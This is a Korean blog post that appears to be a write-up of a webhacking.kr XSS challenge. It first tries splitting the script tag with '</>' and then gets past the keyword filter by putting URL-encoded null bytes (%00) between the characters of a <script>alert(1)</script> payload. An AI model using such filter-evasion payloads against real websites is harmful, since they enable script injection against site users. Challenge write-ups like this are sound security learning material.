<script>alert(1);</script>를 넣어야 한다고 쓰여있다.
따라서 빈칸에 일단 <script>alert(1);</script>를 넣어주니
no hack이 뜬다
계속 입력해본 결과,
sc, al과 같은 문자+문자. 즉, 문자열 조합은 입력 허용되지 않고
<, <>, >등 문자 하나는 입력 허용되며
</>를 입력하면 입력한 것이 사라진다.
따라서,
<</>s</>c</>r</>i</>p</>t>a</>l</>e</>r</>t</>(1);<</>/s</>c</>r</>i</>p</>t>
입력결과
ㅎㅎ 아니었다
문자 하나는 걸러내지 못하고 문자열은 걸러내는 것을 보니
문자를 구분해서 보내면서 서버에서 문자열로 취급할 수 있도록 입력을 해야하는데
찾아보니 urlencoding 방법을 사용하면 이 문제를 쉽게 풀 수 있다고 한다.
NULL은 URL인코딩 시 %00으로
<s%00c%00r%00i%00p%00t>a%00l%00e%00r%00t%00(1);<%00/%00s%00c%00r%00i%00p%00t>
입력 시
'WEB > WEB Hacking' 카테고리의 다른 글
| XSS 취약점 참고 (0) | 2022.11.29 |
|---|---|
| [Webhacking.kr] Challenge(old) 55번 풀이 (0) | 2021.11.10 |
| wfuzz (0) | 2021.07.10 |
| [Webhacking.kr] Challenge(old) 39번 풀이 (0) | 2021.06.07 |
| [Webhacking.kr] Challenge(old) 38번 풀이 (0) | 2021.06.04 |